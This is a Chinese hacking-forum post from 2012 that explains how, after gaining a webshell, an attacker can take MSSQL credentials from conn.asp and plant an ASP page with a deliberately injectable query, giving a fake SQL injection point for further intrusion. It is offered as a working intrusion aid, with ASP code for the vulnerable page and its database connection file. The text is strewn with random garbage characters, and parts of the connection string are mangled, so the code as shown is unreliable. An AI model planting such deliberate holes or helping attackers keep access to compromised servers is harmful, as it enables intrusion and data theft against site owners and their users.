找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1965|回复: 0
打印 上一主题 下一主题

自己构造注入点方便入侵

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:27:31 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
自己构造注入点方便入侵( n6 n' A8 n  Y/ P- x  Q4 ]" N1 R
  H$ g1 J3 F* c7 I" C3 `1 q: o
今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息3 [+ D/ G1 l3 c' {

: T' P0 D4 g& b6 g/ o这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!5 N: f- p5 S& u' i* k: t
  V6 n- ~9 J9 k0 F, H
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和" t! _* x  Q$ s

" c: `4 |/ _' B2 \% h% B密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表
( s, I+ J2 P0 A! P
% o- n- `( U/ B# [3 b  Z因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
& {1 k  ?* S2 {* [0 _! b" b' ]  B
6 ^: F/ i0 [; g+ C. W程序代码% [9 Z# K, I; E& @8 h4 C) w$ P, ~
<!--#include file="xx.asp"-->. Y; ]2 J/ C+ x& _
<%$ a0 K4 M1 B* `% _7 C# q+ R
set rs=server.createobject("ADODB.recordset")
, H# X) G. }8 Q6 cid = request("id")7 L0 g' X6 ^& X$ _" t3 l
strSQL = "select * from admin where id=" & id
3 _) @4 O+ j( ars.open strSQL,conn,1,35 ?' p$ s% M2 C* q& \. p' U
rs.close( F8 X* w, f, ^7 f: m
%>
1 {3 ?7 x; C% B9 U# ^+ r2 h5 ?! S. b7 j- S& w
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在& s" b8 u2 G# A6 w

+ n1 c# E2 ^3 n7 R5 ?. x3 o你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
* u) s  T; e6 {$ X
: z8 C: K* L* {; F" ~然后就要构造一个连接数据库的文件了,代码如下:% C+ E# j! S: v5 b! p
程序代码
/ @4 L: L" J! p8 c: p( E<%        % P0 z2 r( D4 R% [( }& w
strSQLServerName = "000.000.000.000"     '服务器名称或地址: W, Q, D; q; c! a% Q' p
strSQLDBUserName = "sqlname"         '数据库帐号
5 W' x& |* m$ |4 L6 GstrSQLDBPassword = "sqlpass"         '数据库密码
+ G( o& [5 h0 Q( Q1 a8 JstrSQLDBName = "sqldataname"           '数据库名称
8 D: v' c8 b! M7 S5 {  WSet conn = Server.CreateObject("ADODB.Connection")
' P7 i- }! F6 Y9 x8 ~5 y; A0 ~strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"* h6 B) C# K) m, i
conn.open strCon
% ~( {- a" w' }/ I) b%>1 \9 k$ b; ?  V

4 R: S/ P  b* v" w3 T这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,
" U6 G+ j. M0 p+ Y1 }( I
, w5 ]* ?: {+ [: B2 }2 `1 y$ A* [- W& ^8 Q9 ?就这样,正常情况下,就OK了,伪造成功……* p$ g6 D* L) X  h3 d
4 f7 f1 v7 N6 N8 O( E; }# w- C
           如果有什么问题可以提出来大家一起探讨解决。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表